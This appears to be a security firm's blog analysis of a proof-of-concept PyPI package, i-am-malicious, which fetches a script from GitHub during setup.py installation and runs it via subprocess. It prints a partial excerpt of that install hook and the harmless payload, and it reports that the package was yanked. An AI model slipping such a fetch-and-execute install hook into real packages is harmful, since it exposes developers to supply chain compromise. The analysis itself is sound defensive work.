'PoC' Python PyPI package demos supply chain attacks

Reported Jan 04, 2022 by Ashish Bijlani

PoC supply chain attack malicious

This package demonstrates what a malicious PyPI package could do to you :-)

10 Dec, 2020
PyPi Versions 5
Martin Vielsmaier
Deps 1

Our static analysis module flagged package i-am-malicious==1.0.5 as malicious. So we decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.

At Ossillate, we are building a large-scale security analysis platform to vet PyPI Python packages for software supply chain attacks. Our free CLI and CI/CD tools can help developers adopt pre-vetted third-party open-source packages and ship faster.

Our technology-generated shows the use of subprocess, urlopen APIs in setup.py. As setup.py contains the code that is executed immediately upon installation of a package, it is clear that the package trying to communicate with a server during the installation process.


Show details

    with open("/tmp/malicious.py", "wb") as fp:
    subprocess.call(["python", "/tmp/malicious.py"])

Fig 1. setup.py downloads payload from a github repo and executes it during installation

Fig 1 above shows an excerpt from setup.py file. As seen, it first executes downloads a supposedly malicious payload from a GitHub repo using urlopen Python API. Then, the payload is saved as /tmp/malicious.py and executed using the subprocess API.

We downloaded malicious.py manually from the GitHub repo. Fig 2 below shows its contents. While not malicious as of this writing, an attacker could change the contents of malicious.py file in the repo anytime to something that is actually malicious. This definitely is a PoC attack to demonstrate how bad actors could carry out open-source software supply chain attacks.

import datetime as dt

with open("/tmp/malicious-was-here", "w") as fp:
    fp.write("I was here at {}".format(dt.datetime.now()))

We reported our findings to PyPI maintainers, and they have yanked this package.